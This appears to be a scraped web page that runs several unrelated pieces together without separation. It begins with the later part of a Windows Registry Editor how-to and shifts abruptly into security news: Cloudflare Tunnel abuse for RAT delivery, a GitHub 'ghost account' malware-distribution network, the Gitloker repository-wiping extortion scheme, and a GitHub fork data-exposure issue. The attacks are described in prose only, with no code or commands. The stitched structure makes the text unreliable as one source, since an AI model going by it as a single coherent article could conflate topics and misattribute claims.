REG_SZ – A string value that contains text data, such as a username or folder path.
REG_DWORD – A numeric value that contains a 32-bit integer.
REG_QWORD – A numeric value that contains a 64-bit integer.
REG_BINARY – A value that contains binary data, such as an image or sound file.
REG_MULTI_SZ – A string value that contains multiple strings separated by null characters. This is often used for lists or arrays of values.
Each registry value type is used for a specific purpose, and understanding them can help you better manage and customize your Windows operating system.
Viewing Registry keys and values in the Windows Registry Editor Source: BleepingComputer
However, for the most part, when editing the Registry, you will be modifying REG_SZ values for text data and REG_DWORD for numeric data, as they are the most common data types used to stored user-editable data.
Using the Windows Registry Editor
The Windows Registry Editor is a software application created by Microsoft and built into all versions of Windows that allows you to edit the data in the Registry.
The Registry Editor application is located at C:\Windows\regedit.exe,and for the most part, requires administrative privileges to use it properly.
To open the Registry Editor, press the Windows key + R to open the Run dialog box. Next, type “regedit” in the search box and press Enter. If you are shown a prompt asking if you would like to allow the program to make changes, select ‘Yes‘ to continue.
When the Registry Editor is opened, you will see that the window is divided into two panes. The left pane displays a hierarchical tree structure of the Registry’s various keys (folders) and subkeys (subfolders).
The right pane displays the values and data associated with the selected key in the left pane.​
The Windows Registry Editor Source: BleepingComputer
To open a specific Registry key, use the left pane to navigate to the key you want to edit. Then expand a key and click on the plus sign (+) next to it.
To collapse a key, click the minus sign (-) next to it.
When you click on a key in the left pane, the values stored within it will be shown in the right pane.
Now that we know how to navigate the Windows Registry let’s learn how to modify data stored within it.
CREATE A NEW REGISTRY KEY
When configuring new settings in the Windows Registry, you may need to create a key at some point.
Use these steps to create a new key in the Registry:
Right-click on the key you want to create a new subkey under in the left pane.
Select New -> Key.
Enter a name for the new key and press Enter.
CREATING A REGISTRY VALUE
As Registry values contain the data that configure how an application or Windows works, it is common to need to create Registry values.
Use these steps to create a Registry value:
Navigate to the key where you want to create the value.
Right-click on the key and select “New” and then select the type of value you want to create. The kinds of values you can make are explained in the previous section.
Give the new value a name by typing it in the box that appears.
Double-click on the new value to edit its data.
Enter the desired value data and click OK.
RENAMING REGISTRY KEY
Sometimes you may need to rename a Registry value, such as when introducing a typo.
To rename a Registry key, please follow these steps:
Navigate to the key you want to rename.
Right-click the key and select Rename.
Enter the new name for the key in the editable field.
Click anywhere to save the changes.
RENAMING A REGISTRY VALUE
Sometimes you may need to rename a Registry value, such as when introducing a typo.
To rename a Registry value, please follow these steps:
Right-click the value you want to rename in the right pane and select Rename.
Enter the new name for the key in the editable field.
Click anywhere to save the changes.
EDITING REGISTRY VALUE DATA
To make changes to a Registry value, follow these steps:
Double-click on the value you want to edit in the right pane.
The Edit dialog box will appear.
Enter the new value for the key in the ‘Value data’ field.
Click OK to save your changes.
EXPORT A REGISTRY KEY
It is possible to export Registry keys and all their subkeys and values to a registry file.
A registry file ends with .reg, and when you double-click on one in Windows, it will import the data back into the Registry. Exporting a registry key helps create a backup before you make changes to the Registry.
Right-click on the key you want to export in the left pane.
Select Export.
Choose a location to save the exported key and give it a name.
Click Save.
IMPORT A REGISTRY KEY
If you had previously exported a key, you could import its data into the Registry by importing the file using these steps:
Click on File -> Import.
Navigate to the location where you saved the exported key.
Select the key file and click Open.
DELETE A REGISTRY KEY
If you need to delete a Registry key, use the following steps.
Right-click on the key you want to delete in the left pane.
Select ‘Delete‘from the context menu.
Confirm that you want to delete the key by clicking Yes.
Note: If you delete a key, all subkeys and values underneath them will be deleted too!
Note 2: You should only delete a registry key if you know it will not cause issues with your computer!
DELETE A REGISTRY VALUE
If you need to delete a Registry value, use the following steps.
Right-click on the value you want to delete in the right pane.
Select ‘Delete‘ from the context menu.
Confirm that you want to delete the value by clicking Yes.
Note: You should only delete a registry value if you know it will not cause issues with your computer
When done using the Registry Editor, you can close it by clicking on the X in the Window or clicking on File > Exit.
With these steps, you should now be able to use the Windows Registry Editor to navigate and edit the Registry.
However, it is vital to be careful when making changes to the Registry, as incorrect changes can cause severe problems with your system.
Researchers are warning of threat actors increasingly abusing the Cloudflare Tunnel service in malware campaigns that usually deliver remote access trojans (RATs).
This cybercriminal activity was frst detected in February and it is leveraging the TryCloudflare free service to distribute multiple RATs, including AsyncRAT, GuLoader, VenomRAT, Remcos RAT, and Xworm.
Campaigns attributed to the same activity cluster Source: Proofpoint
The Cloudflare Tunnel service allows proxying traffic through an encrypted tunnel to access local services and servers over the internet without exposing IP addresses. This should come with added security and convenience because there is no need to open any public inbound ports or to set up VPN connections.
With TryCloudflare, users can create temporary tunnels to local servers and test the service without the need of a Cloudflare account.
Each tunnel generates a temporary random subdomain on the trycloudflare.com domain, which is used to route traffic through Cloudflare’s network to the local server.
In a report today, cybersecurity company Proofpoint says that it observed malware activity targeting law, finance, manufacturing, and technology organizations with malicious .LNK files hosted on the legitimate TryCloudflare domain.
The threat actors are luring targets with tax-themed emails with URLs or attachments leading to the LNK payload. When launched, the payload runs BAT or CMD scripts that deploy PowerShell.
Two attack chains used in the campaign Source: Proofpoint
In the final stage of the attack, Python installers are downloaded for the final payload.
Proofpoint reports that the email distribution wave that started on July 11 has distributed over 1,500 malicious messages, while an earlier wave from May 28 contained less than 50 messages.
Malicious email sample Source: Proofpoint
Hosting LNK files on Cloudflare offers several benefits, including making the traffic appear legitimate due to the service’s reputation.
Moreover, the TryCloudflare Tunnel feature offers anonymity, and the LNK-serving subdomains are temporary, so blocking them does not help defenders too much.
Ultimately, the service is free and reliable, so the cybercriminals do not need to cover the cost of setting up their own infrastructure. If automation is employed to evade blocks from Cloudflare, the cybercriminals can abuse those tunnels even for large-scale operations.
BleepingComputer has reached Cloudflare for a comment on the activity reported by Proofpoint, and a company representative replied with the following statement:
Cloudflare immediately disables and takes down malicious tunnels as they are discovered by our team or reported on by third parties.
In the past few years, Cloudflare has introduced machine learning detections on our tunnel product in order to better contain malicious activity that may occur.
We encourage Proofpoint and other security vendors to submit any suspicious URLs and we will take action against any customers that use our services for malware.
A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware and netting them $100,000 in illicit profits over the past year.
The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to share malicious links or malware, per Check Point, which has dubbed it “Stargazers Ghost Network.”
Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy.
The network is believed to have been active since August 2022 in some preliminary form, although an advertisement for the DaaS wasn’t spotted in the dark until early July 2023.
“Threat actors now operate a network of ‘Ghost’ accounts that distribute malware via malicious links on their repositories and encrypted archives as releases,” security researcher Antonis Terefos explained in an analysis published last week.
“This network not only distributes malware but also provides various other activities that make these ‘Ghost’ accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories.”
Different categories of GitHub accounts are responsible for distinct aspects of the scheme in an attempt to make their infrastructure more resilient to takedown efforts by GitHub when malicious payloads are flagged on the platform.
These include accounts that serve the phishing repository template, accounts providing the image for the phishing template, and accounts that push malware to the repositories in the form of a password-protected archive masquerading as cracked software and game cheats.
Should the third set of accounts be detected and banned by GitHub, Stargazer Goblin moves to update the first account’s phishing repository with a new link to a new active malicious release, thereby allowing the operators to move forward with minimal disruption.
Besides liking new releases from multiple repositories and committing changes to the README.md files to modify the download links, there is evidence to suggest that some accounts part of the network have been previously compromised, with the credentials likely obtained via stealer malware.
“Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected,” Terefos said.
“It’s common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one.”
One of the campaigns discovered by Check Point involves the use of a malicious link to a GitHub repository that, in turn, points to a PHP script hosted on a WordPress site and delivers an HTML Application (HTA) file to ultimately execute Atlantida Stealer by means of a PowerShell script.
Other malware families propagated via the DaaS are Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point further noted that the GitHub accounts are part of a larger DaaS solution that operates similar ghost accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.
“Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when GitHub disrupts their network,” Terefos said.
“Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts.”
The development comes as unknown threat actors are targeting GitHub repositories, wiping their contents, and asking the victims to reach out to a user named Gitloker on Telegram as part of a new extortion operation that has been ongoing since February 2024.
The social engineering attack targets developers with phishing emails sent from “notifications@github.com,” aiming to trick them into clicking on bogus links under the guise of a job opportunity at GitHub, following which they are prompted to authorize a new OAuth app that erases all the repositories and demands a payment in exchange for restoring access.
It also follows an advisory from Truffle Security that it’s possible to access sensitive data from deleted forks, deleted repositories, and even private repositories on GitHub, urging organizations to take steps to secure against what it’s calling a Cross Fork Object Reference (CFOR) vulnerability.
“A CFOR vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks),” Joe Leon said. “Similar to an Insecure Direct Object Reference, in CFOR users supply commit hashes to directly access commit data that otherwise would not be visible to them.”
In other words, a piece of code committed to a public repository may be accessible forever as long as there exists at least one fork of that repository. On top of that, it could also be used to access code committed between the time an internal fork is created and the repository is made public.
It’s however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation –
Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository
When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone.
“The average user views the separation of private and public repositories as a security boundary, and understandably believes that any data located in a private repository cannot be accessed by public users,” Leon said.
“Unfortunately, […] that is not always true. What’s more, the act of deletion implies the destruction of data. As we saw above, deleting a repository or fork does not mean your commit data is actually deleted.”
